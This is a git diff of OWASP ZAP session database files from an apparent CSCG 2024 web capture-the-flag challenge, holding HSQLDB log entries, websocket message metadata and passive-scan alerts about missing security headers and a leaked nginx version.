BLOCK_ADDR=96 -INSERT INTO BLOCKS VALUES(96,1,0) -INSERT INTO BLOCKS VALUES(97,2147483550,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=96 -INSERT INTO LOBS VALUES(96,1,0,97) -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(105,51,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(106,51,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=15 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Last-Modified' AND USED=2 AND FLAGS='' AND VALS='Thu%2C 01 Jan 1970 00:00:01 GMT' -INSERT INTO PARAM VALUES(15,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Last-Modified',3,'','Thu%2C 01 Jan 1970 00:00:01 GMT') -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(97,1,'2024-03-02 03:38:41.437000',1,97,NULL,339,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=97 -INSERT INTO LOB_IDS VALUES(97,339,1,40) -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=13 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Connection' AND USED=4 AND FLAGS='' AND VALS='keep-alive' -INSERT INTO PARAM VALUES(13,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Connection',5,'','keep-alive') -COMMIT -DELETE FROM PARAM WHERE PARAMID=14 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='ETag' AND USED=4 AND FLAGS='' AND VALS='"1-180","1-11f","1-556"' -INSERT INTO PARAM VALUES(14,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','ETag',5,'','"1-180","1-11f","1-556"') -COMMIT -DELETE FROM PARAM WHERE PARAMID=16 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Cache-Control' AND USED=2 AND FLAGS='' AND VALS='no-store' -INSERT INTO PARAM VALUES(16,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Cache-Control',3,'','no-store') -COMMIT -DELETE FROM PARAM WHERE PARAMID=17 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Accept-Ranges' AND USED=2 AND FLAGS='' AND VALS='bytes' -INSERT INTO PARAM VALUES(17,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Accept-Ranges',3,'','bytes') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(98,625,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 99 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=97 -INSERT INTO BLOCKS VALUES(97,1,0) -INSERT INTO BLOCKS VALUES(98,2147483549,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=97 -INSERT INTO LOBS VALUES(97,1,0,98) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(98,1,'2024-03-02 03:38:41.439000',1,98,NULL,625,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=98 -INSERT INTO LOB_IDS VALUES(98,625,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(99,622,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 100 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=98 -INSERT INTO BLOCKS VALUES(98,1,0) -INSERT INTO BLOCKS VALUES(99,2147483548,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=98 -INSERT INTO LOBS VALUES(98,1,0,99) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(99,1,'2024-03-02 03:38:41.440000',1,99,NULL,622,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=99 -INSERT INTO LOB_IDS VALUES(99,622,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(52,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/style.css','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',29,29,'','',319,15,3,'','10035-1') -COMMIT -INSERT INTO ALERT VALUES(53,0,10036,'Server Leaks Version Information via "Server" HTTP Response Header Field',1,3,'The web/application server is leaking version information via the "Server" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','','','Ensure that your web server, application server, load balancer, etc. is configured to suppress the "Server" header or provide generic details.','https://httpd.apache.org/docs/current/mod/core.html#servertokens\u000ahttps://learn.microsoft.com/en-us/previous-versions/msp-n-p/ff648552(v=pandp.10)\u000ahttps://www.troyhunt.com/shhh-dont-let-your-response-headers/',28,28,'','nginx/1.24.0',200,13,3,'','10036') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(107,53,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(108,53,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -INSERT INTO ALERT_TAG VALUES(109,53,'WSTG-v42-INFO-02','https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server') -COMMIT -INSERT INTO ALERT_TAG VALUES(110,52,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(111,52,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(100,588,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 101 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=99 -INSERT INTO BLOCKS VALUES(99,1,0) -INSERT INTO BLOCKS VALUES(100,2147483547,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=99 -INSERT INTO LOBS VALUES(99,1,0,100) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(101,1,'2024-03-02 03:38:41.449000',1,100,NULL,588,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=100 -INSERT INTO LOB_IDS VALUES(100,588,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(101,652,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 102 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=100 -INSERT INTO BLOCKS VALUES(100,1,0) -INSERT INTO BLOCKS VALUES(101,2147483546,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=100 -INSERT INTO LOBS VALUES(100,1,0,101) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(100,1,'2024-03-02 03:38:41.449000',1,101,NULL,652,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=101 -INSERT INTO LOB_IDS VALUES(101,652,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(54,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',28,28,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(112,54,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(113,54,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(55,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/style.css','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',29,29,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(114,55,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(115,55,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(102,618,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 103 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=101 -INSERT INTO BLOCKS VALUES(101,1,0) -INSERT INTO BLOCKS VALUES(102,2147483545,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=101 -INSERT INTO LOBS VALUES(101,1,0,102) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(103,1,'2024-03-02 03:38:41.472000',1,102,NULL,618,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=102 -INSERT INTO LOB_IDS VALUES(102,618,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(103,609,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 104 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=102 -INSERT INTO BLOCKS VALUES(102,1,0) -INSERT INTO BLOCKS VALUES(103,2147483544,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=102 -INSERT INTO LOBS VALUES(102,1,0,103) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(102,1,'2024-03-02 03:38:41.472000',1,103,NULL,609,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=103 -INSERT INTO LOB_IDS VALUES(103,609,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(104,201,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 105 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=103 -INSERT INTO BLOCKS VALUES(103,1,0) -INSERT INTO BLOCKS VALUES(104,2147483543,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=103 -INSERT INTO LOBS VALUES(103,1,0,104) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(104,1,'2024-03-02 03:38:41.813000',1,104,NULL,201,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=104 -INSERT INTO LOB_IDS VALUES(104,201,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(105,2013,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 106 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=104 -INSERT INTO BLOCKS VALUES(104,1,0) -INSERT INTO BLOCKS VALUES(105,2147483542,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=104 -INSERT INTO LOBS VALUES(104,1,0,105) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(105,1,'2024-03-02 03:38:41.817000',1,105,NULL,2013,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=105 -INSERT INTO LOB_IDS VALUES(105,2013,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(106,176,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 107 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=105 -INSERT INTO BLOCKS VALUES(105,1,0) -INSERT INTO BLOCKS VALUES(106,2147483541,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=105 -INSERT INTO LOBS VALUES(105,1,0,106) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(106,1,'2024-03-02 03:38:41.817000',1,106,NULL,176,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=106 -INSERT INTO LOB_IDS VALUES(106,176,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(107,2662,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 108 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=106 -INSERT INTO BLOCKS VALUES(106,1,0) -INSERT INTO BLOCKS VALUES(107,2147483540,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=106 -INSERT INTO LOBS VALUES(106,1,0,107) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(107,1,'2024-03-02 03:38:41.821000',1,107,NULL,2662,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=107 -INSERT INTO LOB_IDS VALUES(107,2662,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(108,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 109 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=107 -INSERT INTO BLOCKS VALUES(107,1,0) -INSERT INTO BLOCKS VALUES(108,2147483539,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=107 -INSERT INTO LOBS VALUES(107,1,0,108) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(108,1,'2024-03-02 03:38:49.061000',1,108,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=108 -INSERT INTO LOB_IDS VALUES(108,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(109,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 110 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=108 -INSERT INTO BLOCKS VALUES(108,1,0) -INSERT INTO BLOCKS VALUES(109,2147483538,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=108 -INSERT INTO LOBS VALUES(108,1,0,109) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(109,1,'2024-03-02 03:38:59.082000',1,109,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=109 -INSERT INTO LOB_IDS VALUES(109,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(110,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 111 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=109 -INSERT INTO BLOCKS VALUES(109,1,0) -INSERT INTO BLOCKS VALUES(110,2147483537,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=109 -INSERT INTO LOBS VALUES(109,1,0,110) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(110,1,'2024-03-02 03:39:09.067000',1,110,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=110 -INSERT INTO LOB_IDS VALUES(110,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(111,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 112 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=110 -INSERT INTO BLOCKS VALUES(110,1,0) -INSERT INTO BLOCKS VALUES(111,2147483536,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=110 -INSERT INTO LOBS VALUES(110,1,0,111) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(111,1,'2024-03-02 03:39:19.068000',1,111,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=111 -INSERT INTO LOB_IDS VALUES(111,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(112,4,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 113 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=111 -INSERT INTO BLOCKS VALUES(111,1,0) -INSERT INTO BLOCKS VALUES(112,2147483535,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=111 -INSERT INTO LOBS VALUES(111,1,0,112) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(112,1,'2024-03-02 03:39:49.071000',8,112,NULL,2,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=112 -INSERT INTO LOB_IDS VALUES(112,4,1,40) -COMMIT -SET SCHEMA PUBLIC -DELETE FROM WEBSOCKET_CHANNEL WHERE CHANNEL_ID=1 -INSERT INTO WEBSOCKET_CHANNEL VALUES(1,'zap',443,'','2024-03-02 03:34:57.550000','2024-03-02 03:40:10.105000',NULL) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(113,197,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 114 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=112 -INSERT INTO BLOCKS VALUES(112,1,0) -INSERT INTO BLOCKS VALUES(113,2147483534,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=112 -INSERT INTO LOBS VALUES(112,1,0,113) -COMMIT -/*C13*/INSERT INTO WEBSOCKET_MESSAGE VALUES(113,1,'2024-03-02 03:40:10.105000',1,113,NULL,197,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=113 -INSERT INTO LOB_IDS VALUES(113,197,1,40) -COMMIT diff --git a/cscg24/web/intro_web_2/intro_web_2_session.session.properties b/cscg24/web/intro_web_2/intro_web_2_session.session.properties index 75e79aa..7d8518c 100644 --- a/cscg24/web/intro_web_2/intro_web_2_session.session.properties +++ b/cscg24/web/intro_web_2/intro_web_2_session.session.properties @@ -1,5 +1,5 @@ #HSQL Database Engine 2.7.2 -#Sat Mar 02 03:32:43 CET 2024 -tx_timestamp=543 -modified=yes +#Sat Mar 02 04:14:43 CET 2024 +tx_timestamp=61202 +modified=no version=2.7.2 diff --git a/cscg24/web/intro_web_2/intro_web_2_session.session.script b/cscg24/web/intro_web_2/intro_web_2_session.session.script index a167063..3417c3f 100644 --- a/cscg24/web/intro_web_2/intro_web_2_session.session.script +++ b/cscg24/web/intro_web_2/intro_web_2_session.session.script @@ -29,19 +29,19 @@ SET FILES NIO TRUE SET FILES NIO SIZE 256 SET FILES LOG TRUE SET FILES LOG SIZE 50 -SET FILES CHECK 543 -SET DATABASE COLLATION SQL_TEXT PAD SPACE +SET FILES CHECK 61202 +SET DATABASE COLLATION "SQL_TEXT" PAD SPACE CREATE USER SA PASSWORD DIGEST 'd41d8cd98f00b204e9800998ecf8427e' ALTER USER SA SET LOCAL TRUE CREATE SCHEMA PUBLIC AUTHORIZATION DBA CREATE CACHED TABLE PUBLIC.HISTORY(HISTORYID INTEGER GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL PRIMARY KEY,SESSIONID BIGINT NOT NULL,HISTTYPE INTEGER DEFAULT 1,STATUSCODE INTEGER DEFAULT 0,TIMESENTMILLIS BIGINT DEFAULT 0,TIMEELAPSEDMILLIS INTEGER DEFAULT 0,METHOD VARCHAR(1024) DEFAULT '',URI VARCHAR(1048576) DEFAULT '',REQHEADER VARCHAR(4194304) DEFAULT '',REQBODY VARBINARY(16777216) DEFAULT X'',RESHEADER VARCHAR(4194304) DEFAULT '',RESBODY VARBINARY(16777216) DEFAULT X'',TAG VARCHAR(32768) DEFAULT '',NOTE VARCHAR(1048576) DEFAULT '',RESPONSEFROMTARGETHOST BOOLEAN DEFAULT FALSE) -ALTER TABLE PUBLIC.HISTORY ALTER COLUMN HISTORYID RESTART WITH 1 +ALTER TABLE PUBLIC.HISTORY ALTER COLUMN HISTORYID RESTART WITH 209 CREATE INDEX HISTORY_INDEX ON PUBLIC.HISTORY(URI,METHOD,REQBODY,SESSIONID,HISTTYPE,HISTORYID,STATUSCODE) CREATE INDEX INDEX_HISTORY_HISTTYPE ON PUBLIC.HISTORY(HISTTYPE) CREATE INDEX INDEX_HISTORY_SESSIONID ON PUBLIC.HISTORY(SESSIONID) CREATE CACHED TABLE PUBLIC.SESSION(SESSIONID BIGINT NOT NULL PRIMARY KEY,SESSIONNAME VARCHAR(32768) DEFAULT '',LASTACCESS TIMESTAMP DEFAULT LOCALTIMESTAMP NOT NULL) CREATE CACHED TABLE PUBLIC.ALERT(ALERTID INTEGER GENERATED BY DEFAULT AS IDENTITY(START WITH 0) NOT NULL PRIMARY KEY,SCANID INTEGER NOT NULL,PLUGINID INTEGER DEFAULT 0,ALERT VARCHAR(16777216) DEFAULT '',RISK INTEGER DEFAULT 0,RELIABILITY INTEGER DEFAULT 1,DESCRIPTION VARCHAR(16777216) DEFAULT '',URI VARCHAR(1048576) DEFAULT '',PARAM VARCHAR(32768) DEFAULT '',OTHERINFO VARCHAR(16777216) DEFAULT '',SOLUTION VARCHAR(16777216) DEFAULT '',REFERENCE VARCHAR(16777216) DEFAULT '',HISTORYID INTEGER,SOURCEHISTORYID INTEGER DEFAULT 0,ATTACK VARCHAR(32768) DEFAULT '',EVIDENCE VARCHAR(16777216) DEFAULT '',CWEID INTEGER DEFAULT -1,WASCID INTEGER DEFAULT -1,SOURCEID INTEGER DEFAULT 0,INPUT_VECTOR VARCHAR(256) DEFAULT '',ALERTREF VARCHAR(256) DEFAULT '') -ALTER TABLE PUBLIC.ALERT ALTER COLUMN ALERTID RESTART WITH 0 +ALTER TABLE PUBLIC.ALERT ALTER COLUMN ALERTID RESTART WITH 900 CREATE INDEX ALERT_INDEX ON PUBLIC.ALERT(SOURCEHISTORYID) CREATE INDEX INDEX_ALERT_SOURCEID ON PUBLIC.ALERT(SOURCEID) CREATE CACHED TABLE PUBLIC.SCAN(SCANID INTEGER GENERATED BY DEFAULT AS IDENTITY(START WITH 0) NOT NULL PRIMARY KEY,SESSIONID BIGINT NOT NULL,SCANNAME VARCHAR(32768) DEFAULT '',SCANTIME TIMESTAMP DEFAULT LOCALTIMESTAMP NOT NULL) @@ -51,15 +51,15 @@ ALTER TABLE PUBLIC.CONTEXT_DATA ALTER COLUMN DATAID RESTART WITH 52 CREATE INDEX INDEX_CONTEXT_DATA_CONTEXTID ON PUBLIC.CONTEXT_DATA(CONTEXTID) CREATE INDEX INDEX_CONTEXT_DATA_TYPE ON PUBLIC.CONTEXT_DATA(TYPE) CREATE CACHED TABLE PUBLIC.PARAM(PARAMID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL,SITE VARCHAR(32768) NOT NULL,TYPE VARCHAR(32768) NOT NULL,NAME VARCHAR(32768) NOT NULL,USED INTEGER NOT NULL,FLAGS VARCHAR(32768) NOT NULL,VALS VARCHAR(8388608) NOT NULL) -ALTER TABLE PUBLIC.PARAM ALTER COLUMN PARAMID RESTART WITH 1 +ALTER TABLE PUBLIC.PARAM ALTER COLUMN PARAMID RESTART WITH 144 CREATE CACHED TABLE PUBLIC.SESSION_URL(URLID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL,TYPE INTEGER NOT NULL,URL VARCHAR(8192) DEFAULT '') ALTER TABLE PUBLIC.SESSION_URL ALTER COLUMN URLID RESTART WITH 1 CREATE INDEX INDEX_SESSION_URL_TYPE_AND_URL ON PUBLIC.SESSION_URL(TYPE,URL) CREATE CACHED TABLE PUBLIC.TAG(TAGID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL,HISTORYID BIGINT NOT NULL,TAG VARCHAR(1024) DEFAULT '') -ALTER TABLE PUBLIC.TAG ALTER COLUMN TAGID RESTART WITH 1 +ALTER TABLE PUBLIC.TAG ALTER COLUMN TAGID RESTART WITH 115 CREATE INDEX INDEX_TAG_HISTORYID_TAG ON PUBLIC.TAG(HISTORYID,TAG) CREATE CACHED TABLE PUBLIC.ALERT_TAG(TAG_ID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL PRIMARY KEY,ALERT_ID BIGINT NOT NULL,KEY VARCHAR(1024) DEFAULT '' NOT NULL,VALUE VARCHAR(4000) DEFAULT '' NOT NULL) -ALTER TABLE PUBLIC.ALERT_TAG ALTER COLUMN TAG_ID RESTART WITH 1 +ALTER TABLE PUBLIC.ALERT_TAG ALTER COLUMN TAG_ID RESTART WITH 951 CREATE INDEX ALERT_ID_INDEX ON PUBLIC.ALERT_TAG(ALERT_ID) CREATE CACHED TABLE PUBLIC.STRUCTURE(STRUCTUREID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL,SESSIONID BIGINT NOT NULL,PARENTID BIGINT NOT NULL,HISTORYID INTEGER,NAME VARCHAR(8192) NOT NULL,NAMEHASH BIGINT NOT NULL,URL VARCHAR(8192) NOT NULL,METHOD VARCHAR(10) NOT NULL) ALTER TABLE PUBLIC.STRUCTURE ALTER COLUMN STRUCTUREID RESTART WITH 1 @@ -69,10 +69,17 @@ CREATE CACHED TABLE PUBLIC.WEBSOCKET_MESSAGE_FUZZ(FUZZ_ID BIGINT NOT NULL,MESSAG CREATE CACHED TABLE PUBLIC.SOAP_WSDL(WSDL_ID INTEGER NOT NULL,SOAP_ACTION VARCHAR(4000) NOT NULL,PRIMARY KEY(WSDL_ID,SOAP_ACTION)) CREATE CACHED TABLE PUBLIC.OPENAPI_SPECS(ID INTEGER GENERATED BY DEFAULT AS IDENTITY(START WITH 0) NOT NULL PRIMARY KEY,DEFINITION CLOB(64M) NOT NULL,TARGET VARCHAR(2048),SESSION_ID BIGINT NOT NULL,CONTEXT_ID INTEGER NOT NULL) ALTER TABLE PUBLIC.OPENAPI_SPECS ALTER COLUMN ID RESTART WITH 0 -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 1 +ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 1040 SET DATABASE DEFAULT INITIAL SCHEMA PUBLIC -SET TABLE PUBLIC.SESSION INDEX '103 0 1' +SET TABLE PUBLIC.HISTORY INDEX '92472 226 93408 92472 0 0 0 0 30' +SET TABLE PUBLIC.SESSION INDEX '104 0 1' +SET TABLE PUBLIC.ALERT INDEX '54383 26833 54383 0 0 0 536' SET TABLE PUBLIC.CONTEXT_DATA INDEX '63 63 63 0 0 0 51' +SET TABLE 